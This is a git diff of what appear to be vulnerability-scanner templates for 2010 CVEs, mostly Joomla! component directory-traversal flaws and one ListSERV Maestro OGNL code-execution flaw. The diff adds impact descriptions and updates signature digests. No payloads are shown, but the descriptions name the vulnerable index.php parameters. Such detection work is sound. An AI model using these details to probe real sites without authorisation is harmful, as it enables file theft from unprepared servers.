info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201967b4c3c553b85753c96453352662e3f7890a26eb58a993edced6f3be58650c022035e5f1890e59fee34c845574cfbccbce4299a018eec5ef2b1d87d3bce5ad134d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204029fb965c07390c26ef14cd50c268e79b556490205f907ea2518cd51b310187022100fc6c41b9d87e8863813ab20b07ed17cab76497f2ff13b40f2bb722b76ee9224b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 2326b0ee80..3ff52be6ef 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201cc16ba6256c0a7700fd76e341194e4ca6a09969021e24381387dd24f828b260022100db3855c65874d12567c3012a5e88f1c59bca1a6399395707e262c32d9800744c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025b9b98f4d35753e0c141616a32cc51ad3a7ba2109c5eadcffdf73c6be6d596b02210096818c1f3cb022812038e4df2cbeaee4a59c717b09ae154ceba6ec71683353be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 980db82714..09c267dabe 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11853 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028f7506b0d389861b6c14cb8e45f7aad5539739eaa27dc0b483c77de1f8d4ff0022077f110f38f6bfd7515973550ae149bc20180e3f0e5fbf5932244278174539a5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f608aef30150d5e5c232e9d8dcc6df9cdfd7e21f5ce65d95be6a773a89e08a7202206ba7e3cdef270c98019ad813be0f23b6d5fc484487c52d466c8d0f694ebb3050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index d50675fd6f..3bbf52e59f 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -5,6 +5,8 @@ info: author: b0yd severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability. reference: @@ -40,4 +42,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a00473045022100a242b0189ad97b2d795336624cf531136e407e57b6e0c52c0fc8e4eca692a39a02204f15c177244d9ea3fe83da7eeca74327c80f817d5993bf6ab6c7138792e07cb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ef3e6075b857e768a6c73e6ab6b832333c026b5215f724a1c1326d408f7476702210080cedbaf8d0aa28a9ecf41eef8caa268141b32cd8ef87dbfd6c6bf9506c177e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index c2708d5c0c..56261b336d 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server. remediation: | To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082eaff0ee8d516e24c4bda026bd64d2c248a32fb9769408dc83c25f73bedbfaf022100fc766d692c0d0efa229ded3594f84a17852493e59583a2b28307dbbed494c325:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096599b6938468d1724b9c666c12272f8761f1c49b7234c79b9da17d8069660b0022100ae9cad5a44599e30600a668bdaf45f2c7c5933125c8a51761948d9a0edac674f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 5027b915a7..62426ab49f 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f556a8ecae8a105097cafc748304efd98467005b886d5581307d7c6ae81865df022100d72c132b485850e259696c0787eb84cf71febebeb35edcdc362558b5fbbe9001:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204fe41f3fd8697df9c9c614652c99e747d454f93efd44feb9db9d1713ff84bdd1022041601d6ab93517d57967de9b29c4d524a4020d711d1f56e102ea04795e6c2bd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 317602d80b..04edc067bb 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12239 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbdb472620fe8b7619082d1034a20032869a7431015b7d1e3b78227c90e345e30220553ca1a44ee7d7ce74d987b448d6cc12e680570cb855abb87493fafcab7b8dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b77b1aa781afb8f30a0407d366a5c4b2a339748c0653b543fac57e537f06f0b90220374c1afe6bc15dfb4dbac3f006793b00b9507f2de2358b1d30c92c9b60a2865d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index d0d30f8994..8c32ba2958 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12288 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b35cca42ac21b6983cc8ed8e8faeb1c08f207601722e06191e199996f0c4ea5a022100a0148ec52a2c91914dabb8cffdd31ca9e044205365100e35a3c97e512945537d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a8c827a37e9c486aa5fa22a7d5bb958527f763e3356b20a6a00bd7686088a3a02201160221b0ce54c42b9010b07dea23a4285638a613b99006da211d6d2461c513b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 5b09fdd669..9eb526f467 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12238 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210089eb4102ae44a2ffd45bcbd216308af8b26c7bf5720beb809ada98574dbbafca022039a4babd37caf5eb8dbc07d87a1bf443275ca6ed7c50431525e711958865c5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f4489f8b45d80704037cd3d084a66bed44d825de4f0b0e9976e13041a708d0eb022034251a6380f133fdee626900b4c3e35fe6f53cbb1a0e06226b9af9fa92d5be3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 2d85939a4c..1b512a94d8 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12285 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220080495bc9c6b9ab3c198fc6455d36b7e23044d2268509fe920bed5822f0786e4022100f26e0f382f9195769af095ee5855209fbead3a17efe0ec00181fae2b340e42a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cd813160bc5df34b92a04ebe5bc25538644b05407f4557d7f1e3699eb2738477022100d6e64050632ee2df63a0646d3c279e06a4169ad9c47bc6234a6bd00febcfe022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 545668d97c..0a9bca3a17 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12235 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071798c7cb01da8bd4310fb461e84ddcad992aa3213671db2ac78fe85c9e22c0f022100f87cd8b7f953e34e4f7a6a65344ad491eeb41d2ec209c7ad93f1f7cea9881eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f674e133070fef23bfc4ae1cd446c12b63e60dddd20fa2bbf3a6b386b663f9d002210090748da31b933be0ac8c56c26b1a0c81da8b037c7457ed3f7f9de00e6d1b1988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 85cbdcafac..184d1cd462 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12083 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e00cc4b75ad7ed3fe500137eea231351e71682b2967f06db378471e92b20492e02200a4efa7715adf1e532dd6858da1b0cb743bbc1b145db3949aed56a06f48fcf84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f381c6bd2f0253efe1483cbd1ff74b59a37069dfa799e862e6c431de98e344c702202062a659f3bf9bf958e1a4aadbf67e07fb30d90d88140602aaa10158caac3347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 720316587d..c2e68854c0 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12088 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220648b163ba23a62b4760d669300fdc055f48cbe973b35b0aa57e6dfb899fe7e3a022044e08f679e2a97632bbf72f81e56239c9b19df9b09198e1d4e97be70d14fbc3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d0d7fb9b7ca49039651bba15cdae46e8d3c34eab245c063d2d85a86cd4edb6c022100eda90cae8a943ceabe34fc18d99c354c3c00473ad8b80d22f9c56f449c84633c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 4ad2eefd05..25c1b9eabf 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12085 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022021dc15978a79e101c18758979e7b13c2063785423553fce7e0690ee9157ddd0802206fed8046d2113545d7e7cd869e868130ca7db443430ddbac3249f88d075ca341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220539f782a9c5542207d586e38c6b76362a601745fa4c623a93ed82ef86c0964bf022047be814d1d5bfbf20ec8397ab00a88cc61feafb3db3673b1a3ff16eafb58d261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index b938122ee1..ee53c321b2 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12087 @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d80b9fc7fb3e35d2dc6047c33f3e7a7cba9925bc1dc99bc13ab184106a8af09f02206dac061cd8719aef9b943e898d44a6b25b552293c451030e89dc552354473fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8dd075c2ff4fcbe1ea6c7990fcc179393d96de943d6da50ee5d4bfb9709eca0022100fa05ee5d0e8996852dbd4c47e067becca1e6317d96ce5cf3a59f4967ea5e8dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index f1195e034a..2ba73f338c 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12121 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b2d29941ae7eccf4af8b3cb8e6cb11621e89186f1f6d4b96ef3dda7828e05650220088fafea1fcb85dd966b8431d7ef52e54b3478bfa59e50ece9d086ff7de74c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c4befc54c58c718425c23978d26d27f5186f121b1526e5ae8e8ba31b03609bb022100fd9f75d9caca461ff58f9e699377a521b225791878c5f76517151fcbf0967697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 5ad768d414..44e3198e6f 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12055 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205c03f407c696255cb2181d11f9a488de589f775cb8d1ec9a5fd668d68e7cc3ea02202472c73bd9ac55cdbac6c1605637ebc35bbfb0cdf4d916680a81b88bc6debfda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f21979aa6337361f235bf3e8a9d6dbe8f1d9649dcacfe9b1c1cc6c2bc821b56022100f6c096abff5b3c5258c2f2ef595d7277245e11e619fad038a3b45e02ffd10f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 919d504232..d417e287d9 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b7369948bb6455f3080ef7570b840bd8d6e2cb0502c00d30f16afa198705d1a402203832fbe6d2fefccf2d349cfb20a3234b3c5c446282667caf02d01ddaa694fb8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b85c8dbd2c3d870feaa77152d698d27e68ba3e633388167d223ed2d52f5a4c8022100a81bd1c134ea547ab9327934e70f799d61760947e8c45b6772398819c583c8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index bf1c825e71..43e2ec117e 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34003 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008b630abf7eb18bc19fc250229e81145829391209c282e3ffe156e6d2a32f03c02205e1f52dbcca831a745cf5b0699da12b42f4772ed70524628883c9b0a08a0ce6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa640c948119b286df93f9be8d64309532b2e40defe14624efb45252ffe48c63022100b9bebade79b7fd6623d04434246593e6f22a9dfe5df5ebf2b7932d6ebf35060d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 8ea3c47ad7..764f39ae1a 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34006 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220017288c38316efe9ecaf7e3c142862f23518a6851bc51f924558f5ff05bb83b8022100d9302c9594c308c29f7f48b6429a999042c09667062927e170c4d7a35aa8e4f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b34c29fe1f1c74fdfb477df382907e0e678ec8d0edef26b57955499820762075022056655cc35c216a2779bbcc446a466020f32a142cd247877a81d90150317332a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index b7cbb57e1b..d198971167 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34004 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3d5e11463fea00fc8ea6c39d3ebb2b6faca82dbb003d2df97948afa39ce5fb5022040dfaa69076440e97c55326590c4101742e97363038e7f21817724e757cdeb8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022018b41597188ecdf7078080c36fb2f00046dcf374f659900b130a457b29f0c7a80220146c0933b38da8fa58556f877044de2d95444dc063a86de47bb213ce4cfe97ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 52bb29f154..2a84ad43d9 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34005 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9b6d4cb087351f9bbfa5d26235e4a21cfff11d665337847ba26e846db810d6f022100e8c7811588708a14f05413dbe75fd5b89903259791d53c44b4441c912ed1db35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0dc47212898eb091df74236685b77998209ca78058c2dc670b09c01c9e4237a022054b30b0fda49971bf03c7fa66d263d93ce1612b83cd30200ca9fb66935f58441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 1a26fcd907..5905cb0977 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207373f7cb791f81eddbf0a1b8b668d512e0ed216817535ece1614c068dd0887bf02202503c2af2bfb408fad21ea17a0095eb751baa132159150a27fdeb7ae01d9c83d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202204d189f12836aab573b907af0c77342ed476c85174a34b4d425e0907216d50022070202d7e8c7655fa80ed2098d9461ff3ae92107234d4877f0cf675eaa5f5d2b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 92afc9fe75..8f2d7df959 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12611 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220601cb95f34571c666483781468e0ca54cc0dc4d3bf666a38e9c1335bc0b79f29022100c1d129fef04cd524fd16386596124cae16fae430893a6e39de2c000a1ed47224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220539e9d6bb4b7d50a7f9a7b667d71f867c1269d30d845e61f29b8e88370f80d1e022100ac97c13da8a1971722dd205468217eaba67767118bd97cf63e9c933f099c8715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 6a1ba0df78..833fba3283 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can 